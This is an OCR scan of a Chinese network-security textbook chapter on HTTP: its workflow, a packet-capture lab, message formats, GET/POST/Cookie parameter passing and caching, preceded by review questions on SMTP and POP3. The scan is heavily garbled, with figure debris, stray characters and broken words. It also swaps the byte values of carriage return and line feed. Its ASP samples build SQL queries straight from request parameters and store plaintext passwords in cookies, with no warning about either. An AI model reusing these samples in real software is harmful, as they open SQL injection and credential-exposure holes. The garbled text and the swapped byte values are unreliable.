机 稍 后 也 会 收 到 真正 的 DNS 服务 器 的 DNS 响应 报 文 ,不 过 这 时 已 经 来 不 及 了 。 由 于 
DNS 回答 报 文 是 以 UDP 数据 报 方式 发 送 ,UDP 报 文 比 TCP 报 文 段 简单 许多 ,这 也 就 意 
味 着 黑客 伪造 一 个 DNS 回答 报 文 是 极其 简单 的 事 。 


1. 使 用 SMTP 传送 邮件 是 否 安 全 ? 如 果 不 安全 ,可 以 采取 哪些 措施 提高 SMTP 的 
安全 性 ? 

2. SMTP 能 否 应 对 伪造 邮件 行为 ? 

3. ESMTP 增加 了 哪些 安全 机 制 ? 

4. 使 用 POP3 接收 邮件 是 否 安全 ? 如 果 不 安全 ,可 以 采取 哪些 措施 提高 POP3 的 安 
全 性 ? 
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第 10 登 
“HTTP 及 其 安全 问题 


10.1 HTTP 的 工作 流程 


HTTP 定义 了 浏览 器 ( 即 客户 端 ) 怎 样 向 万 维 网 服务 器 请 求 资源 ,以 及 服务 器 怎样 把 
资源 传递 给 客户 。HTTP 是 万 维 网 上 可 靠 交 换文 件 (包括 文本 、 声 音 、 图 像 ) 的 重要 基础 。 
下 面 举例 说 明 HTTP 的 工作 流程 。 

在 如 图 10-1 所 示 的 网 络 环境 中 ,Local NET 包括 两 台 主 机 (主机 1 和 主机 2) ,网 关 为 
R1。Internet 上 给 出 两 台 服 务 器 ,其 中 Web 服务 器 上 搭建 了 一 个 网 站 ,在 网 站 的 主 目录 
下 保存 了 index. html\1.jpg、1. html 和 1. wav 共 4 个 文件 , 供 客户 访问 。 另 一 台 DNS 服 
务 器 的 转换 表 中 包含 Web 服务 器 的 域名 (www. abc. com) 和 IP 地 址 (210. 47. 128. 134)。 


DNS 转 换 表 资源 文件 
www.abc.com index.html 
210.47.128.134 1.jpg 
www.def.com 1.html 
50.20.10.79 1.wav 


Ee Web 服 务 器 
| | Internet Wwww.abc.com 
一 一 Wd 210.47.128.134 
DNS 服 务 器 
210.47.128.135 
210.47.128.1 
6B RI 主机 2 192.168.111.4 
Local NET 


ll 192.168.111.3 
主机 1 
图 10-1 网 络 拓扑 


我 们 以 主机 1 上 的 客户 浏览 Web 服务 器 上 的 index. html 和 1. jpg 为 例 介 绍 HTTP 
的 工作 流程 。 当 客户 在 下 浏览 器 的 地 址 栏 中 输入 "http://www. abc. com/index. html” 
之 后 ,主机 1 的 TCP/IP 协议 栈 自动 按照 三 个 步骤 进行 工作 。 

第 一 步 是 获取 网 关 R1 的 MAC 地 址 。 由 于 网 关 R1 是 Local NET 的 唯一 出 口 ,主机 
1 发 给 Internet 的 数据 报 必 须 经 过 有 1 才能 传递 到 Internet, 因 此 主机 1 必须 知道 R1 的 


IE 网 络 安全 基础 al 


MAC 地 址 。 主 机 1 先 判断 自己 的 ARP 缓存 表 中 是 否 包 含 网 关 R1 的 MAC 地 址 ,如 包含 
则 直接 取出 网 关 的 MAC 地 址 并 进行 下 一 步 ,否则 使 用 ARP 请 求 网 关 的 MAC 地 址 , 即 
主机 1 向 网 关 R1 发 送 一 个 ARP 请 求 报 文 ,网 关 返 回 一 个 ARP 应 答 报 文 , 其 中 携带 了 网 
关 的 MAC 地 址 ,主机 1 将 网 关 的 IP 和 MAC 地 址 添加 到 自己 的 ARP 缓存 表 中 ,以 后 再 
与 外 网 通信 时 可 以 直接 使 用 ARP 缓存 表 中 的 网 关 地 址 。 

第 二 步 是 获得 域名 www. abc. com 对 应 的 IP 地 址 。 主 机 1 要 与 Web 服务 器 进行 通 
信 必 须 首 先 获得 Web 服务 器 的 IP 地 址 。 主 机 1 先 查 看 自己 的 DNS 缓存 表 中 是 否 包含 
www. abc. com 的 映射 记录 ,如 包含 则 直接 取出 Web 服务 器 的 IP 地 址 并 进行 下 一 步 , 否 
则 使 用 DNS 协议 获得 域名 www. abc. com 对 应 的 IP 地 址 , 即 向 DNS 服务 器 发 送 一 个 请 
求 报 文 ,DNS 服务 器 返回 一 个 应 答 报 文 ,其 中 携带 了 www. abc. com 对 应 的 IP 地 址 210. 
47.128.134。 主 机 1 将 Web 服务 器 的 域名 和 IP 地 址 添加 到 自己 的 DNS 缓存 中 ,以 后 再 
与 Web 服务 器 通信 时 可 以 直接 使 用 DNS 缓存 中 的 Web 服务 器 IP 地 址 。 

第 三 步 是 从 Web 服务 器 获取 资源 文件 。HTTP 在 传输 层 是 基于 TCP 的 ,因此 主机 
1 先 通过 三 次 握手 机 制 与 Web 服务 器 的 80 端口 建立 一 条 TCP 逻辑 连接 。 之 后 主机 1 向 
Web 服务 器 发 送 一 个 HTTP 一 GET 报 文 ,请 求 Web 服务 器 上 的 index. html 文件 。 服 务 
器 收 到 这 个 请 求 之 后 将 index. html 文件 封装 在 一 个 HTTP 应 答 报 文中 返回 给 主机 1 
( 注 ; 如 果 index. html 文件 容量 较 大 ,可 以 通过 多 个 HTTP 应 答 报 文 发 送 给 主机 1)。 其 
后 主机 1 又 向 Web 服务 器 发 送 了 一 个 HTTP 一 GET 报 文 ,请求 1. jpg, Web 服务 器 同样 
使 用 若干 个 HTTP 应 答 报 文 将 1. jpg 返回 给 主机 1。 假 设 在 这 之 后 用 户 结束 了 对 这 台 
Web 服务 器 的 访问 ,转向 浏览 其 他 服务 器 的 主页 ,那么 主机 1 会 主动 向 Web 服务 器 
(www. abc. com) 发 起 四 次 挥手 过 程 ,正常 终止 这 条 TCP 逻辑 连接 。 如 果 客 户 直接 关闭 
了 主机 1 上 的 浏览 器 窗口 ,那么 主机 1 会 通过 发 送 RST 报 文 异常 终止 这 条 TCP 连接 。 

HTTP 工作 流程 如 图 10-2 所 示 。 


Client Gateway 
arp request 
arp response 
DNS Server 
DNS request 
DNS response 
| 
1 Web Server 


TCP three-way handshake 


HTTP-GET:index.html 
HTTP:index.html 
HTTP-GET:1.jpg 


[L HTITP:1i jpg 创 ] 


TCP stop connection 


图 10-2 HTTP 的 工作 流程 
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训练 : 按照 图 10-1 组 建 网 络 , 使 用 Sniffer 捕获 通信 数据 ,分 析 HTTP 的 工作 流程 。 

第 一 步 : 利用 虚拟 机 组 建 如 图 10-1 所 示 的 网 络 环境 ,配置 路 由 器 实现 网 络 连通 、 搭 
建 DNS 和 Web 服务 器 实现 通过 域名 访问 Web 站 点 (注意 : 为 了 简化 操作 将 DNS 服务 器 
直接 搭建 在 网 关上 ,具体 操作 步骤 略 ) 。 

第 二 步 : 在 主机 2 访问 index. html 和 1. html, 即 在 浏览 器 中 依次 输入 http://www. 
abc. com/index. html 和 http://www. abc. com/1. html, 然后 关闭 浏览 器 ,同时 使 用 
Sniffer 捕获 通信 数据 ,分 析 HTTP 的 工作 流程 。 捕 获 的 通信 数据 如 图 10-3 所 示 。 


EOEOEOEOEOEO ARP A=[192.168.111.1] HA=000C295C7E7B PRO=IP 
[210.47.128.1] ID- 本 oe ERY We WwWW ,abc .co 
[192.168.111.4] |DNS 5 ok 


Www .abc .com 
[192.168.111.4] 
ww .abc .com 


gw -二 bc COm 
[192.168.111.4] 

[192.168.111.4] 。 | www ,abc .com 

11 |[192 .168 111 4] 。 | www abc com 
com [192.168.111.4] 


TTE =OK-9 b 
[192.168.111.4] | www.abc .com TCP: D 006 ACK=3951041336 YIN- E36 
my .abc ,com Ce: D 006 RST ACK=3951041336 WIN=0 


图 10-3 使 用 Sniffer 捕获 的 通信 数据 


共 捕 获 14 个 数据 包 。 前 两 个 报 文 是 通信 的 第 一 阶段 ,第 1 个 数据 包 是 主机 2 广播 的 
ARP 请 求 报 文 , 第 2 个 数据 包 是 网 关 返 回 的 ARP 应 答 报 文 , 其 中 携带 了 网 关 的 MAC 地 
址 : 00-0C-29-5C-7E-7B。 

第 3 个 报 文 是 主机 2 发 出 的 DNS 请 求 报 文 ,请 求 DNS 服务 器 解析 www. abc. com 
对 应 的 IP 地 址 。 第 4 个 报 文 是 DNS 服务 器 返回 的 应 答 报 文 ,其 中 包含 域名 www. abc. 
com 对 应 的 IP 地 址 210. 47. 128. 134。 

第 5.6.7 个 数据 包 是 TCP 三 次 握手 建立 连接 报 文 。 第 8 个 报 文 是 主机 2 向 Web 服 
务 器 发 出 的 HTTP 一 GET 请 求 报 文 ,请 求 浏览 index. html。 第 9 个 报 文 是 Web 服务 器 
返回 的 HTTP 应 答 报 文 , 其 中 携带 了 index. html 文件 的 内 容 。 第 10 个 报 文 是 主机 2 发 
送 的 ACK 确认 报 文 ,用 于 通知 Web 服务 器 第 9 个 数据 包 已 经 正确 接收 。 

第 11 个 报 文 是 主机 2 向 Web 服务 器 发 出 的 HTTP 一 GET 请 求 报 文 ,请 求 浏览 
1. html。 第 12 个 报 文 是 Web 服务 器 返回 的 HTTP 应 答 报 文 ,其 中 携带 了 1. html 文件 的 内 
容 。 由 于 客户 直接 关闭 了 浏览 器 窗 体 , 因 此 最 后 两 个 数据 包 是 TCP 连接 异常 终止 报 文 。 


和 2 HTTP 的 报 文 格 式 


HTTP 的 工作 模式 是 基于 请 求 和 应 答 模 式 的 ,以 图 10-4 为 例 进 行 说 明 。 客 户 向 站 点 
A 请 求 A 网 页 ,站 点 A Se 个 应 答 报 文 将 A 网 页 返回 给 该 客户 。 接 着 客户 又 向 站 点 也 
请 求 B 网 页 ,站 点 B 通过 一 个 应 答 报 文 将 B 网 页 返回 给 客户 。 客 户 和 服务 器 之 间 就 是 采 
eae ere 下 面 分 别 学 习 HTTP 的 请 求 和 应 答 报 文 
的 格式 。 
HTTP 请 求 报 文 的 格式 如 图 10-5 所 示 。 按 照 TCP/IP 协议 簇 划 分 为 4 层 结构 , 即 数 
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Client 


Web Page A 


Web PageB 


应 答 报 文 | 


图 10-4 HTTP 的 请 求 和 应 答 模 式 


据 链 路 层 (14 字 节 )、 网 络 层 (20 字 节 ) ,传输 层 (20 字 节 ) 和 应 用 层 (n 字 节 ) 。 


s-port 


d-port 


seq number 


ack unmber 


DEST MAC 


flag 


window 


SOURCE MAC 


check 


urg 


1 


Link data 


JP header 


14B 几 
length 
id flag 
check 
client ip 
Web server ip 


GET/index.html HTTP/1.1 


Accept:image/gif, image/jpeg 


Accept-Language:zh-cn 


Accept-Encoding:gzip, deflate 
User-Agent:Mozilla/4.0 MSIE 6.0 


Host:www.abc.com 


Connection:Keep-Alive 


图 10-5 HTTP 请 求 报 文 的 格式 


前 14 个 字 节 是 数据 链 路 层 数据 ,其 中 包含 源 和 目的 MAC 地 址 ,协议 类 型 字段 为 
0x0800( 指 明 网 络 层 采用 的 是 IP 协议 ) 。 
其 后 20 字 节 是 IP 首部 数据 ,其 中 源 IP 地 址 为 客户 主机 IP, 目 的 IP 地 址 为 Web 服 


务 顺 的 IP 地址 。 


接 下 来 是 20 字 节 的 TCP 首部 数据 ,其 中 源 端 口 是 大 于 1024 的 随机 端口 ,目的 端口 


是 80。 


最 后 是 n 字 节 的 HTTP 数据 ,这 里 给 出 的 是 客户 发 给 服务 器 的 HTTP 请 求 报 文 。 
这 个 HTTP 请 求 报 文 由 8 行 ASCII 数据 组 成 ,每 行 尾部 有 一 个 回 车 (0x0a) 和 一 个 换行 
(0x0d) 。 第 1 行 数据 表明 客户 以 GET 方式 请 求 Web 服务 器 主 目录 下 的 index. html 文 
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件 , 使 用 的 HTTP 版 本 是 1.1。 第 2 行 表明 客户 可 以 接受 的 文件 类 型 包括 gif\bmp jpeg 
等 。 第 3 行 表明 客户 可 以 接受 的 语言 类 型 为 中 文 ,zh-cn 代表 简体 中 文 。 第 4 行 表明 客户 
可 以 接收 的 编码 类 型 为 gzip 和 deflate。 第 5 行 表 明 客 户 使 用 的 浏览 器 类 型 为 MSIE6.0。 
第 6 行 表明 Web 服务 器 的 域名 为 www. abc. com。 第 7 行 表 明 TCP 连接 类 型 ,Keep- 
Alive 是 持久 连接 , 即 在 一 条 TCP 连接 之 内 访问 多 个 Web 服务 器 资源 。 另 一 种 取 值 是 
close, 代 表 请 求 完 当 前 文档 (本 例 就 是 index. html) 之 后 立即 关闭 这 条 TCP 连接 。 第 8 行 
是 一 个 空 行 , 只 包括 一 个 回 车 (0x0a) 和 一 个 换行 (0x0d) 。 

HTTP 应 答 报 文 的 格式 如 图 10-6 所 示 。 按 照 TCP/IP 协议 复 划 分 为 4 层 结构 , 即 数 
据 链 路 层 (14 字 节 )、 网 络 层 (20 字 节 ) ,传输 层 (20 字 节 ) 和 应 用 层 (n 字 节 ) 。 


S-port d-port 
seq number 
ack unmber 
DESTMAC flag window 
| SOURCEMAC | check urg 


个 
Link data IP header | 
14B U 20B UL 
length HTTP/1.1 200 OK 
id flag Server:Microsoft-I1S/5.1 
check Date:Sat,10 Nov 2012 06:19:57 GMT 
Web server ip Content-Type:text/html 
client ip Accept-Ranges:bytes 


Last-Modified:Sat, 10 Nov 2012 06:17:48 GMT 
Content-Length:5 


hello 


图 10-6 HTTP 应 答 报 文 的 格式 


前 14 个 字 节 是 数据 链 路 层 数 据 , 其 中 包含 源 和 目的 MAC 地 址 ,协议 类 型 字段 为 
0x0800( 指 明 网 络 层 采用 的 是 IP 协议 ) 。 其 后 20 字 节 是 IP 首部 数据 ,其 中 源 IP 地 址 为 
Web 服务 器 IP, 目 的 IP 地 址 为 客户 主机 的 IP 地 址 。 接 下 来 是 20 字 节 的 TCP 首部 数 
据 , 其 中 源 端口 是 80 ,目的 端口 是 大 于 1024 的 随机 端口 。 

最 后 是 n 字 节 的 HTTP 数据 ,这 里 给 出 的 是 服务 器 返回 给 客户 的 HTTP 应 答 报 文 。 
这 个 HTTP 应 答 报 文 由 9 行 ASCII 数据 组 成 ,每 行 尾 部 有 一 个 回 车 (0x0a) 和 一 个 换行 
(0x0d)。 第 1 行 表明 客户 请 求 的 执行 结果 ,200 代表 服务 器 已 经 正确 处 理 该 请 求 。 常 见 
的 返回 值 还 包括 400( 错 误 的 请 求 )、404( 未 找到 客户 请 求 的 资源 )。 第 2 行 代表 Web 服 
务 器 的 类 型 为 Microsoft-IIS/5.1。 第 3 行 表 明 访 问 的 时 间 。 第 4 行 表 明 这 个 HTTP 应 
答 报 文 携 带 的 数据 类 型 是 文本 文件 。 第 5 行 表 明文 件 的 传输 单位 是 字 节 。 第 6 行 表明 这 
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个 资源 文件 (本 例 为 index. html) 的 最 后 一 次 修改 时 间 。 第 7 行为 这 个 HTTP 报 文 携带 
数据 的 长 度 , 即 index. html 文件 的 长 度 。 第 8 行 是 一 个 空 行 , 只 包括 一 个 回 车 (0x0a) 和 
一 个 换行 (0x0d) ,表明 HTTP 首部 的 结束 ,其 后 是 HTTP 数据 部 分 。 9 行 是 HTTP 
数据 部 分 ,携带 的 是 index. html 文件 的 内 容 ,本 例 为 字符 串 “hello”。 


103 ”HTTP 使 用 GET、POST 和 Cookie 方式 


动态 网 页 (如 asp、jsp、php 等 ) 会 根据 客户 提交 的 参数 ,返回 给 客户 不 同 的 结果 。 因 
此 动态 网 页 使 网 站 的 互动 性 更 强 , 在 网 站 设计 中 被 大 量 使 用 。 客 户 通常 通过 三 种 方式 向 
Web 服务 器 端的 动态 网 页 提交 参数 , 即 GET .POST 和 Cookie 方 式 , 下 面 分 别 进 行 介 绍 。 


10.3.1 GET 方式 提交 参数 


GET 方式 提交 参数 的 应 用 举例 如 图 10-7 所 示 。 在 服务 器 端 数 据 库 中 存在 一 个 user 
数据 表 , 其 中 保存 了 两 个 用 户 信息 (Peter 和 Jack)。 在 服务 器 的 网 站 主 目录 下 存在 一 
动态 网 页 user. asp, 它 会 将 客户 提交 的 账户 信息 与 user 数据 表 中 的 合法 账户 信息 进行 比 
较 , 如 果 存 在 匹配 记录 , 则 返回 该 用 户 的 相关 信息 ,和 否则 返回 出 错 提示 。 


database user table 


username | password QQ E-mail 
Peter 2480 543678 | pe@126.com 
Jack 2336 678934 | ja@163.com 
Peter Server 


点 书 user.asp 


select*from user 

where username=request.querystring(user) 

GET:user.asp?user=Peter&pass=2480 and password=request.querystring(pass) 
| 


ifthis user exist) then 
response this user information 
else 
Tesponse.write(“not found..”) 
end if 


HTTP:OK 
Peter information 


图 10-7 GET 方式 提交 参数 举例 


客户 在 自己 的 下 浏览 器 地 址 栏 中 输入 “http://serverIP/user. asp? user 一 
peter&.pass 二 2480” 回 车 ,之 后 客户 主机 会 使 用 HTTP 一 GET 方式 将 这 组 账户 信息 提交 
给 服务 器 端的 user. asp。user. asp 使 用 request. querystring() 方 法 读 出 用 户 名 (Peter) 和 
密码 (2480) ,然后 通过 一 条 select 数据 库 查 询 语句 到 user 数据 表 中 进行 检索 ,发 现 与 第 
一 条 记录 匹配 ,于 是 user. asp 将 Peter 用 户 的 相关 信息 通过 一 个 HTTP 的 应 答 数 据 报 返 
回 给 客户 。 

HTTP 一 GET 请 求 报 文 的 结构 如 图 10-8 所 示 。 可 以 看 到 客户 提交 的 账户 信息 包含 
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在 GET 请求 行 之 中 。 
s-port d-port 
seq number 
ack unmber 
DEST MAC flag window 
SOURCE MAC check ug 
个 20B 
Link data IP header 


十 U 


| length GET/user.asp?user=peter&pass=2480 HTTP/1.1 
id flag Accept:image/gif, image/jpeg 
| check Accept-Language:zh-cn 
client ip Accept-Encoding:gzip, deflate 
Web server ip User-Agent:Mozilla/4.0 MSIE 80 
Host:192.168.111.4 


Connection:Keep-Alive 


图 10-8 HTTP 一 GET 请 求 报 文 


服务 器 返回 给 客户 的 HTTP 应 答 报 文 如 图 10-9 所 示 。 可 见 Peter 的 账户 信息 包含 
在 HTTP 的 数据 部 分 。 


S-port d-port 
seq number 
ack unmber 
DEST MAC flag window 
| SOURCEMAC | check urg 
个 20B 个 nB 


Link data IP header HTTP data 
14B U 20B 几 
length HTTP/1.1 200 OK 
id flag Server:Microsoft-IIS/5.1 
check Date:Sun, 11 Nov 2012 05:08:12 GMT 
Web server ip Content-Type:text/html 
client ip Content-Length:23 
Cache-control:privatte 
账户 信息 一 一 | peter.3543678.pe@126.com 


图 10-9 服务 器 返回 给 客户 的 HTTP 应 答 报 文 
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1032 POST 方式 提交 参数 


GET 方式 提交 的 参数 会 出 现在 客户 主机 的 浏览 器 地 址 栏 中 ,一 些 敏 感 的 参数 ,例如 
账户 名 、 密 码 等 信息 不 适合 采用 这 种 方式 提交 。 这 些 敏 感 信 息 通常 以 POST 方式 提交 给 
服务 器 ,下 面 举例 说 明 ( 见 图 10-10)。 


database user table 


username | password QQ E-mail 
Peter 2480 543678 | pe@126.com 
| Jack 2336 | 678934 | ja@163.com 
Peter Server 
[JJ 
一 过 user.asp 
. select*from user 
GET:login.html | where username=request.form(user) 
and password=request.form(pass) 
| 过 HTTP:OK if(this user exist) then 
response this user information 
User: CD else 
as: response.write(“not found..”) 
POST:user.asp end if 
user=Peter&pass=2480 
| 
HTTP:OK 
Peter information 
了 了 


图 10-10 POST 方式 提交 参数 举例 


在 上 面 的 例子 中 ,客户 首先 向 服务 器 发 出 一 个 GET 请 求 报 文 , 请 求 获 取 login. html。 
服务 器 通过 一 个 HTTP 应 答 报 文 将 login. html 返回 给 客户 。 客 户主 机 的 浏览 器 将 
login. html 解释 为 一 个 登录 窗口 ,包含 输入 用 户 名 、 密 码 的 文本 框 和 “确定 ”按钮 。 

客户 输入 用 户 名 Peter、 密 码 2480, 单 击 “ 确 定 ” 按 钮 之 后 .客户 机 以 POST 方式 将 账户 信 
息 发 送 给 服务 器 端的 user. asp。user. asp 使 用 request. form() 方 法 读 出 用 户 名 (Peter) 和 密 
码 (2480) ,然后 通过 一 条 select 数据 库 查询 语句 到 user 数据 表 中 进行 检索 ,发 现 与 第 一 条 记 
录 匹 配 , 于 是 user. asp 将 Peter 用 户 的 相关 信息 通过 一 个 HTTP 的 应 答 数 据 报 返回 给 客户 。 

客户 提交 给 服务 器 的 HTTP 一 POST 请 求 报 文 如 图 10-11 所 示 。HTTP 首部 的 第 一 
行 表明 提交 方式 为 POST,Referer 参数 表明 在 这 之 前 客户 访问 了 login. html, 客 户 提交 
的 账户 信息 包含 在 HTTP 数据 部 分 。 


10.33 Cookie 方式 提交 参数 


Web 服务 器 将 用 户 的 一 些 私人 信息 记录 在 客户 机 的 Cookie 文件 中 ,例如 客户 购买 
过 的 商品 ,关注 过 的 信息 等 , 当 用 户 再 次 登录 这 台 Web 服务 器 时 ,Cookie 文件 中 的 内 容 
会 自动 传送 给 服务 器 , Web 服务 器 在 读 取 Cookie 的 内 容 之 后 ,可 以 了 解 到 客户 曾经 浏览 
过 的 信息 ,进而 有 针对 性 地 为 这 个 客户 定制 符合 他 兴趣 的 页 面 。 

有 时 在 用 户 登录 成 功 之 后 ,Web 服务 器 也 会 将 账户 名 和 密码 保存 在 客户 机 的 Cookie 
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文件 中 , 当 用 户 再 次 登录 这 台 Web 服务 器 时 ,客户 机 发 出 的 HTTP 请 求 报 文 中 会 自动 扒 
带 Cookie 文件 中 的 账户 信息 ,这 时 客户 可 以 无 须 输入 用 户 名 、 密 码 就 直接 登录 站 点 ,简化 
了 访问 流程 。 当 前 Cookie 技术 被 广泛 应 用 于 各 大 网 站 。 


s-port d-port 
seq number 
ack unmber 
DEST MAC flag | window 
SOURCE MAC check we 
人 20B 
Link data IP header i 
14B UL 
| length POST/user.asp HTTP/1.1 
id flag Accept:image/gif, image/jpeg 
| check Referer:http://192.168.111/.4/login.html 
client ip Accept-Language:zh-cn 
Web server ip Accept-Encoding:gzip, deflate 


User-Agent:Mozilla/4.0 MSIE 8.0 
Host:192.168.111.4 
Content-Length:20 


Connection:Keep-Alive 


User=Peter&pass=2480 


图 10-11 HTTP 一 POST 请 求 报 文 


Cookie 文件 在 客户 机 上 以 两 种 形式 存在 ,一 种 是 永久 文件 方式 , 另 一 种 是 临时 文件 
方式 。 永 久 的 Cookie wenn a ee and Settings\ 用 户 名 \Cookies” 文 
件 夹 下 ,该 路 径 下 的 每 个 Cookie 文件 只 一 个 特定 的 Web 站 点 , 当 客 户 再 次 访问 这 个 
站 点 时 ,对 应 Cookie 文件 中 的 内 容 会 dh Web 服务 器 。 客 户 可 以 通过 浏览 器 的 
“Internet 选项 ”清除 Cookies 文件 夹 内 的 所 有 Cookie 文件 。 另 一 种 临时 Cookie 文件 保 
存在 客户 机 浏览 器 缓存 之 中 , 当 用 户 访 问 特定 Web 站 点 时 ,形成 这 类 Cookie 文件 , 当 用 
户 关闭 浏览 器 时 ,这 些 临时 Cookie 文件 自动 消失 。 

第 三 种 提交 参数 的 方式 是 Cookie 方式 ,但 是 这 种 方式 无 法 由 客户 输入 参数 ,而 是 由 
Web 服务 器 预先 将 参数 写 人 客户 机 的 Cookie 文件 ,这 些 参数 会 随 着 客户 发 出 的 HTTP 
请 求 传递 给 Web 服务 器 ,下 面 举 例 分 析 Cookie 方式 。 

在 如 图 10-12 所 示 的 例子 中 ,客户 首先 以 GET 方式 请 求 set-cookie. asp ,这 个 动态 网 
页 通过 两 条 response. Cookies() 命 令 在 HTTP 应 签 报 文 的 首部 添加 一 行 设置 Cookie 命 
邻 (Set-cookie:user 二 peter pass 一 2480) 。 客 户 收 到 这 个 HTTP 应 答 报 文 之 后 ,会 将 这 组 
ry \` 密 码 信息 存储 在 浏览 器 的 临时 Cookie 文件 中 (如 果 关 闭 浏览 器 ,缓存 内 容 自 动 清 

。 之 后 客户 发 往 这 台 服 务 器 的 所 有 HTTP 请 求 报 文 都 会 携带 这 组 账户 信息 。 
接 下 来 客户 以 GET 方式 访问 user. asp, 即 在 浏览 器 地 址 栏 中 输入 “http://web 
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Peter 


GET:set-cookie.asp 


Server 


HTTP:OK 


Set-cookie:user=Peter pass=2480 
一 


GET:user.asp 
COOKIE:user=Peter&pass=2480 


| 


HTTP:OK 
Peter information 


1 


database user table 


username | password QQ E-mail 
Peter 2480 543678 | pe@126.com 
Jack 2336 | 678934 | ja@163.com 
set-cookie.asp 
<% 


response.cookies(“user”)="“Peter” 
response.cookies(“pass™)="“2480” 
%> 


user.asp 


select*from user 
where username=request.cookies(user) 
and password=request.cookies(pass) 


ifthis user exist) then 

response this user information 
else 

response.write(“not found..”) 
endif 


图 10-12 ”Cookie 方 式 提交 参数 举例 


serverip/user. asp”。 这 个 GET 请 求 报 文 的 HTTP 首部 Cookie 参数 部 分 携带 了 账户 信 
息 。user. asp 使 用 两 条 request. Cookies() 命 令 读 出 用 户 名 和 密码 ,验证 账户 信息 正确 之 
后 ,将 用 户 Peter 的 个 人 信息 通过 一 个 HTTP 应 答 报 文 返回 给 客户 。 

图 10-13 是 服务 器 返回 给 客户 的 设置 Cookie 报 文 ,HTTP 首部 的 两 条 Set-cookie 命 


s-port d-port 


DEST MAC 
SOURCE MAC 


check 


seq number 


ack unmber 


0 


HTTP/1.1 200 OK 


Server:Microsoft-IIS/5.1 


Date:Sun, 11 Nov 2012 07:14:24 GMT 


Content-Type:text/html 


Link data 
14B U 
length 
id flag 
check 
Web server ip 
client ip 


Content-Length:0 


Cache-control:private 


Set-Cookie:user=Peter; path=/ 


Set-Cookie:pass=2480; path=/ 


图 10-13 服务 器 返回 的 设置 Cookie 报 文 
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令 设 置 了 用 户 名 和 密码 。 
图 10-14 是 客户 发 出 的 HTTP 请 求 报 文 ,以 GET 方式 请 求 user. asp ,在 HTTP 首部 
的 Cookie 参数 中 携带 了 Cookie 数据 , 即 Peter 的 账户 信息 。 


s-port d-port 
seq number 
ack unmber 
DEST MAC flag | window 
SOURCE MAC check we 
个 20B 
Link data IP header 
14B | UL 
length GET/user.asp HTTP/1.1 
id flag Accept:image/gif, image/jpeg 
check Accept-Language:zh-cn 
client ip Accept-Encoding:gzip, deflate 
Web server ip User-Agent:Mozilla/4.0 MSIE 8.0 


Host:192.168.111.4 


Connection:Keep-Alive 


Cookie:user=Peter; pass=2480 


图 10-14 客户 发 出 的 GET 请 求 报 文 中 携带 了 Cookie 数据 


_ 104 HTTP 的 缓存 机 制 


客户 浏览 Web 服务 器 上 的 某 个 资源 文件 (如 index. html) 之 后 ,这 个 资源 文件 会 保存 
在 客户 主机 的 临时 文件 夹 中 (在 Windows XP 系统 中 ,这 个 临时 文件 夹 位 于 “系统 盘 :\ 
Documents and Settings\ 用 户 名 \Local Settings\Temporary Internet Files”) 。 当 客户 再 
次 浏览 这 个 资源 文件 时 ,如 果 服 务 器 端的 资源 文件 没有 改变 , 则 服务 器 并 不 重 传 这 个 文 
件 , 而 是 通知 客户 使 用 自己 临时 文件 夹 内 的 备份 文件 。 如 果 服 务 右 端的 资源 文件 发 生 了 
变化 ,服务 器 才 会 重新 传递 这 个 文件 ,这 就 是 HTTP 的 缓存 机 制 。 利 用 这 种 机 制 可 以 减 
少 很 多 不 必要 的 通信 数据 ,提高 通信 效率 。 下 面 举例 分 析 HTTP 的 缓存 机 制 ,如 图 10-15 
所 示 。 

在 如 图 10-15 所 示 的 例子 中 ,在 格林 尼 治 标准 时 间 2012-11-17 00:54:01 在 Web 服 
务 器 的 网 站 主 目录 下 创建 了 index. html, 其 内 容 为 hello。 随 后 客户 使 用 HTTP 一 GET 
方式 请 求 浏览 index. html。 服 务 器 收 到 这 个 请 求 之 后 ,返回 如 图 10-16 所 示 应 答 数 据 报 。 

这 个 应 答 数据 报 的 HTTP 首部 Date 参数 表明 服务 器 在 格林 尼 治 标准 时 间 2012-11- 
17 01:00:16 返回 这 个 应 答 数据 报 。LasrModified 参数 表明 index. html 文件 最 后 一 次 
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Client Web server 
HTTP-GET:index.html 一 一 2012-11-17 00:54:01 
i create:index.html 
HTTP:index.html content:hello 


Last-Modified:Sat, 17 Nov 2012 
00:54:01 GMT 
— = 2012-11-17 01:00:16 


response:hello 


HTTP-GET:index.html 
If-Modified-Since:Sat, 17 Nov 2012 


00:54:01 GMT 
| 
HTTP:Not Modified 
r= = 2012-11-17 01:00:20 
response:Not Modified 
一 一 2012-11-17 01:00:4 
HTTP-GET:index.html 0 Ep 6 
If-Modified-Since:Sat, 17 Nov 2012 content:hello!! 
00:54:01 GMT J 
| 


HTTP:index.html 
Last-Modified:Sat, 17 Nov 2012 


01:00:46 GMT 
一 中 | 上 2012-11-17 01:00:57 
response:hello!! 
1 ' 


图 10-15 ”HTTP 的 缓存 机 制 


s-port d-port 
seq number 
ack unmber 
DEST MAC flag | window 
SOURCE MAC check ug 
个 20B 个 nB 


Link data IP header 


14B UL 20B UL 
| length HTTP/1.1 200 OK 
id | flag Server:Microsoft-IIS/5.1 
| check Date:Sat, 17 Nov 2012 01:00:16 GMT 
Web server ip Content-Type:text/html 
client ip Accept-Ranges:bytes 


Last-Modified:Sat, 17 Nov 2012 00:54:01 GMT 


Content-Length:5 


hello 


图 10-16 第 二 个 数据 报 是 服务 器 返回 的 应 答 报 文 
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修改 时 间 为 格林 尼 治 标准 时 间 2012-11-17 00:54:01。 应 答 数 据 报 的 HTTP 数据 部 分 携 
带 了 index. html 文件 的 内 容 , 即 字符 串 “hello”。 间 隔 几 秒 钟 之 后 客户 再 次 请 求 浏览 
index. html, 这 个 HTTP 请 求 报 文 如 图 10-17 所 示 。 


s-port d-port 
seq number 
ack unmber 
DEST MAC flag window 
SOURCE MAC check ve 


人 


Link data IP header HTTP data 


14B U 20B U 


length GET/index.html HTTP/1.1 
id flag Accept:^/^ 
check Accept-Language:zh-cn 
client ip Accept-Encoding:gzip,deflate 
Web server ip User-Agent:Mozilla/4.0 MSIE 6.0 


If-Modified-Since:Sat 17 Nov 2012 00:54:01 GMT 


Host:www.abc.com 


Connection:Keep-Alive 


图 10-17 第 三 个 数据 报 是 客户 再 次 请 求 浏览 index. html 


这 个 请 求 报 文 的 HTTP 首部 携带 If-Modified-Since 参数 , 它 是 在 询问 Web 服务 器 
“格林 尼 治 标准 时 间 2012-11-17 00:54:01 之 后 index. html 文件 是 否 进 行 过 修改 ”, 服 务 
器 将 这 个 时 间 与 index. html 文件 的 最 后 一 次 修改 时 间 进 行 一 下 比较 ,发 现 两 者 相同 ,说 
